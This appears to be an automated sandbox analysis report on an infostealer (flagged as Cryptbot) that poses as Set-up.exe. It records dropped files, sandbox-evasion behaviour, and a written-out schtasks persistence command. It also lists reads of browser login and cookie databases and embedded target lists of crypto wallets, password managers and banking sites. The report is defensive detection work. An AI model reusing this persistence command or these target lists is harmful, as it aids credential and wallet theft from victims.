Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: hwyuauvxqdekcixujard.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: hwyuauvxqdekcixujard.dll	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Set-up.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Set-up.exe

Static file information: File size 9979904 > 1048576

Source: Set-up.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c1c00
Source: Set-up.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x670c00

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_001E8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

4_2_001E8230

Source: Set-up.exe	Static PE information: section name: .eh_fram
Source: service123.exe.0.dr	Static PE information: section name: .eh_fram
Source: HwYuaUvXqdEkCixuJard.dll.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_001EA499 push es; iretd	4_2_001EA694
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7A8C2A push edx; mov dword ptr [esp], ebx	4_2_6C7A8C3E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7B4DC1 push eax; mov dword ptr [esp], ebx	4_2_6C7B4DD5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7D4DB0 push eax; mov dword ptr [esp], ebx	4_2_6C7D5018
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7A6E03 push edx; mov dword ptr [esp], ebx	4_2_6C7A6E17
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7B4FA1 push eax; mov dword ptr [esp], ebx	4_2_6C7B4FB5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7DE860 push eax; mov dword ptr [esp], ebx	4_2_6C7DE98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7B285C push edx; mov dword ptr [esp], ebx	4_2_6C7B2870
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7B0852 push eax; mov dword ptr [esp], ebx	4_2_6C7B0866
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7C8850 push eax; mov dword ptr [esp], ebx	4_2_6C7C8E4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C8109E0 push eax; mov dword ptr [esp], edi	4_2_6C810B5A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7E29A0 push eax; mov dword ptr [esp], ebx	4_2_6C7E2CD4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7E29A0 push edx; mov dword ptr [esp], ebx	4_2_6C7E2CF3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7DEAC0 push eax; mov dword ptr [esp], ebx	4_2_6C7DEBE3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7B4BE1 push eax; mov dword ptr [esp], ebx	4_2_6C7B4BF5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7F0460 push eax; mov dword ptr [esp], ebx	4_2_6C7F07FF
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7A0452 push eax; mov dword ptr [esp], ebx	4_2_6C7A048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7B8451 push 890005EAh; ret	4_2_6C7B8459
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7A04BE push eax; mov dword ptr [esp], ebx	4_2_6C7A048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7A04AD push eax; mov dword ptr [esp], ebx	4_2_6C7A048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7A64A3 push edx; mov dword ptr [esp], ebx	4_2_6C7A64B7
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7AA527 push eax; mov dword ptr [esp], ebx	4_2_6C7AA53B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C781AAA push eax; mov dword ptr [esp], ebx	4_2_6C836622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C781AAA push eax; mov dword ptr [esp], ebx	4_2_6C836622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7AA6F7 push eax; mov dword ptr [esp], ebx	4_2_6C7AA70B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C786003 push eax; mov dword ptr [esp], ebx	4_2_6C836AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C786003 push edx; mov dword ptr [esp], edi	4_2_6C836B36
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7B40D5 push ecx; mov dword ptr [esp], ebx	4_2_6C7B40E9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C786098 push eax; mov dword ptr [esp], ebx	4_2_6C836622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7A81E5 push edx; mov dword ptr [esp], ebx	4_2_6C7A81F9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C7A023B push eax; mov dword ptr [esp], ebx	4_2_6C7A0251

Source: C:\Users\user\Desktop\Set-up.exe	File created: C:\Users\user\AppData\Local\Temp\HwYuaUvXqdEkCixuJard.dll			Jump to dropped file
Source: C:\Users\user\Desktop\Set-up.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Set-up.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f

Source: C:\Users\user\Desktop\Set-up.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_4-160260

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Stalling execution: Execution stalls by calling Sleep

graph_4-160261

Source: C:\Users\user\Desktop\Set-up.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Window / User API: threadDelayed 819

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

API coverage: 1.1 %

Source: C:\Users\user\Desktop\Set-up.exe TID: 2084	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5648	Thread sleep count: 819 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5648	Thread sleep time: -81900s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior

Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Set-up.exe	Binary or memory string: VMware
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: Set-up.exe	Binary or memory string: 7libgcc_s_dw2-1.dll__register_frame_info__deregister_frame_infofactorBlizzard.txtSystem Profile.kdbDualSenseXSunSilhouette AmericaJxBrowsersdkLibraryVisual Studio SetupbackupsDaumworkspace-storageXiaomiExodus EdenGIMPbfnaelmomeimhlpmgjnjophhpkkoljpaLocal StoreSketchUpDownloaded Installations.jpeglocalization-cacheUniSDKContinuous MigrationSteam\BitTorrenttonseeedwindowParams.jsonViberEpicGamesLauncherAuthgameThinkBuzanStorageRestor.thinkorswimpocoProgramDataBeamNG.drivecodepeubandlab-assistantStreamingVideoProvider\PerfLogs...microAppsnavigationSpoonholdlinknowwodlSUPERAntiSpywareUARJaxxcarddumpsdoge3uToolsAdvinstAnalyticsbtcTerminal Server Client.jpgProgram Filesuser_data#2.VirtualBoxcitizenfxfnjhmkhhmkbjkkabndcnnogagogbneecaholpfdialjgjfhomihkjbmgjidlcdnoVaultlibrariesusdcom.adobe.dunamisViberPCmonnaietdummymentalmentorElevatedDiagnosticsWindowsA7FDF864FBC10B77emojiAvid.pwd.dochodlCodeTwoWinRARApplicationInsightsticketDRPSuJetBrainsNewTekWindows Live.rtfPackage CacheRAV Endpoint ProtectionTeraBoxTransferSupportRazer\Amazon MusicbhhhlbepdkbapadjdnnojkbgioiodbicSpellingDriverPack Cloud2FAHiSuitedlcobpjiigpikoobohmabehhmhfoodbbFACEIT\tronWebTorrentstremioTSMonitoraccountZXPInstaller\MacromediaCiscoSparkHewlett-PackardToolbarcartiTop PDFpayCode\NoxeurRealwebviewScreenadspower_globalTencentSnapshotsUI LauncherCLR_v4.0.pdfClassicShellltc.pngF8806DD0C461824Fuser_data#5CLR_v2.0_32.openshot_qtD877F783D5D3EF8CDoremidaiDropboxarduino-ideCreativeFiveM\.xlsSamsung MagicianokxNVIDIA Corporation\ReasonSaferWebIdentityCachecomponentsWhatsApp\FacebookLlaveuser_data#4TokenBrokerJDownloader 2.0Valve Corporationexodus.walletVirtualStoreWondershareCode - Insiders\DiscoveryLibreOfficeklnaejjgbibmhlephnhpmaofohgkpgkdZomboidCrashReportClientJavaScriptLedger Live\Rocket LeagueARMDropboxElectronNavegadorSeguroCENEVALSidify Music Converterbluestacks-servicesIK Product ManagerSony CorporationAdawareCredentialsVS Revo Groupuser_dataMiniTool Video ConverterOneNoteOverwolf\EasyAntiCheatDataFolderimportdeemix MusicLavasoftVMwareDATAparkPublicSlackPreSonusRealNetworksRealPlayercom.liberty.jaxxMcAfee_IncTreexyAndroid Open Source Project\Program Files (x86)Riot Games\ContactsXpomBlack Sea Studiosassets.arduinoIDEMicrosoft GamesAdobeSearchesGuest ProfileSpeechQRmainWindows StoreJackbox GamesNotionPunkBusterHabbo Launchernodobs-studio\ljfoeinjpaedjfecbmggjgodbgkmjkjkindexpipCrystal DynamicsPowerISOEOS Webcam UtilityVirtualBoxBlendEdgeUpdateUTC--2masterSystemCertificatessourcePicWishCLR_v2.0.minecraftGMEGLOBALuser_data#3AIMPhakuneko-desktopWebStoragevisa/home/anal/bot/zip_include/miniz.hpArray->m_element_sized->m_huff_code_sizes[0][s_tdefl_len_sym[match_len]]bits <= ((1U << len) - 1U)d->m_huff_code_sizes[1][sym]d->m_huff_code_sizes[0][lit]after create bufferbefore create buffererror 4104error 5105106107101103102100code < TDEFL_MAX_HUFF_SYMBOLS_2
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Set-up.exe, 00000000.00000003.2336684023.0000000001775000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2843692223.0000000001775000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Set-up.exe, 00000000.00000002.2843692223.000000000172E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp<x
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: Set-up.exe, 00000000.00000000.2222222678.0000000001464000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: libgcc_s_dw2-1.dll__register_frame_info__deregister_frame_infofactorBlizzard.txtSystem Profile.kdbDualSenseXSunSilhouette AmericaJxBrowsersdkLibraryVisual Studio SetupbackupsDaumworkspace-storageXiaomiExodus EdenGIMPbfnaelmomeimhlpmgjnjophhpkkoljpaLocal StoreSketchUpDownloaded Installations.jpeglocalization-cacheUniSDKContinuous MigrationSteam\BitTorrenttonseeedwindowParams.jsonViberEpicGamesLauncherAuthgameThinkBuzanStorageRestor.thinkorswimpocoProgramDataBeamNG.drivecodepeubandlab-assistantStreamingVideoProvider\PerfLogs...microAppsnavigationSpoonholdlinknowwodlSUPERAntiSpywareUARJaxxcarddumpsdoge3uToolsAdvinstAnalyticsbtcTerminal Server Client.jpgProgram Filesuser_data#2.VirtualBoxcitizenfxfnjhmkhhmkbjkkabndcnnogagogbneecaholpfdialjgjfhomihkjbmgjidlcdnoVaultlibrariesusdcom.adobe.dunamisViberPCmonnaietdummymentalmentorElevatedDiagnosticsWindowsA7FDF864FBC10B77emojiAvid.pwd.dochodlCodeTwoWinRARApplicationInsightsticketDRPSuJetBrainsNewTekWindows Live.rtfPackage CacheRAV Endpoint ProtectionTeraBoxTransferSupportRazer\Amazon MusicbhhhlbepdkbapadjdnnojkbgioiodbicSpellingDriverPack Cloud2FAHiSuitedlcobpjiigpikoobohmabehhmhfoodbbFACEIT\tronWebTorrentstremioTSMonitoraccountZXPInstaller\MacromediaCiscoSparkHewlett-PackardToolbarcartiTop PDFpayCode\NoxeurRealwebviewScreenadspower_globalTencentSnapshotsUI LauncherCLR_v4.0.pdfClassicShellltc.pngF8806DD0C461824Fuser_data#5CLR_v2.0_32.openshot_qtD877F783D5D3EF8CDoremidaiDropboxarduino-ideCreativeFiveM\.xlsSamsung MagicianokxNVIDIA Corporation\ReasonSaferWebIdentityCachecomponentsWhatsApp\FacebookLlaveuser_data#4TokenBrokerJDownloader 2.0Valve Corporationexodus.walletVirtualStoreWondershareCode - Insiders\DiscoveryLibreOfficeklnaejjgbibmhlephnhpmaofohgkpgkdZomboidCrashReportClientJavaScriptLedger Live\Rocket LeagueARMDropboxElectronNavegadorSeguroCENEVALSidify Music Converterbluestacks-servicesIK Product ManagerSony CorporationAdawareCredentialsVS Revo Groupuser_dataMiniTool Video ConverterOneNoteOverwolf\EasyAntiCheatDataFolderimportdeemix MusicLavasoftVMwareDATAparkPublicSlackPreSonusRealNetworksRealPlayercom.liberty.jaxxMcAfee_IncTreexyAndroid Open Source Project\Program Files (x86)Riot Games\ContactsXpomBlack Sea Studiosassets.arduinoIDEMicrosoft GamesAdobeSearchesGuest ProfileSpeechQRmainWindows StoreJackbox GamesNotionPunkBusterHabbo Launchernodobs-studio\ljfoeinjpaedjfecbmggjgodbgkmjkjkindexpipCrystal DynamicsPowerISOEOS Webcam UtilityVirtualBoxBlendEdgeUpdateUTC--2masterSystemCertificatessourcePicWishCLR_v2.0.minecraftGMEGLOBALuser_data#3AIMPhakuneko-desktopWebStoragevisa/home/anal/bot/zip_include/miniz.hpArray->m_element_sized->m_huff_code_sizes[0][s_tdefl_len_sym[match_len]]bits <= ((1U << len) - 1U)d->m_huff_code_sizes[1][sym]d->m_huff_code_sizes[0][lit]after create bufferbefore create buffererror 4104error 5105106107101103102100code < TDEFL_MAX_HUFF_SYMBOLS_2
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Set-up.exe, 00000000.00000003.2378708875.000000000DADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_001E8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

4_2_001E8230

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_001E116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	4_2_001E116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_001E1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	4_2_001E1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_001E11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	4_2_001E11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_001E13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,	4_2_001E13C9

Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"			Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_6C7E8280 cpuid

4_2_6C7E8280

Source: C:\Users\user\Desktop\Set-up.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 4.2.service123.exe.6c760000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2825437842.000000000445D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Set-up.exe PID: 6244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: service123.exe PID: 5608, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 6244, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Set-up.exe	String found in binary or memory: \Electrum-btcp\wallets
Source: Set-up.exe	String found in binary or memory: \ElectronCash\wallets
Source: Set-up.exe, 00000000.00000000.2222222678.0000000001464000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Windows 8.1 %wSWindows Server 2012 R2 %wSWindows 11 %wSWindows 10 %wSWindows Server 2016 or higher %wSWindows %wS %wSE:I:F:G:H:D:C:NitroOxygen - Atomic Crypto WalletYoroiPolkadot{.js} extensionSolflare WalletSui WalletBitwarden - Free Password ManagerLastPass - Free Password ManagerEnkrypt - Multichain Crypto WalletRabby WalletAuthyCrypto.com - Wallet ExtensionZilPayExodus Web3 WalletTrust WalletMartian Aptos & Sui Wallet ExtensionOKX WalletAuthenticatorBackpackXverse WalletUniSat WalletTonkeeper - wallet for TONSafePal Extension WalletKeplrTemple - Tezos WalletMEW CXJaxx LibertyGuarda WalletSollet WalletTrezor Password ManagerUnknown Walletdragon.exeAvastBrowser.exechrome.exeAVGBrowser.exebrowser.exebrave.exe360ChromeX.exeslimjet.exevivaldi.exeCCleanerBrowser.execatsxp.exeopera.exemsedge.exeBrowserskey3.dbsignons.sqliteoptimization_guide_model_storeWeb ApplicationsSegmentation Platformnot initializedinvalid entry nameentry not foundinvalid zip modeinvalid compression levelno zip 64 supportmemset errorcannot write data to entrycannot initialize tdefl compressorinvalid indexheader not foundcannot flush tdefl buffercannot write entry headercannot create entry headercannot write to central dircannot open fileinvalid entry typeextracting data using no memory allocationfile not foundno permissionout of memoryinvalid zip archive namemake dir errorsymlink errorclose archive errorcapacity size too smallfseek errorfread errorfwrite errorcannot initialize readercannot initialize writercannot initialize writer from readerstream endneed dictionaryfile errorstream errordata errorout of memorybuf errorversion errorparameter errorbefore addDatAndEthFilesbefore addCryptoWallets\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)HP_Easy_StartBaiduBrowserCache\Opera Software\\User Data\\Desktop\Profiles\no errorundefined errortoo many filesfile too largeunsupported methodunsupported encryptionunsupported featurefailed finding central directorynot a ZIP archiveinvalid header or archive is corruptedunsupported multidisk archivedecompression failed or archive is corruptedcompression failedunexpected decompressed sizeCRC-32 check failedunsupported central directory sizeallocation failedfile open failedfile create failedfile write failedfile read failedfile close failedfile seek failedfile stat failedinvalid parameterinvalid filenamebuffer too smallinternal errorfile not foundarchive is too largevalidation failedwrite callback failedtotal errors
Source: Set-up.exe	String found in binary or memory: com.liberty.jaxx
Source: Set-up.exe	String found in binary or memory: \Exodus\backup
Source: Set-up.exe	String found in binary or memory: \exodus.wallet
Source: Set-up.exe	String found in binary or memory: Ethereum (UTC)

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 6244, type: MEMORYSTR

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 6244, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	2 Clipboard Data	112 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
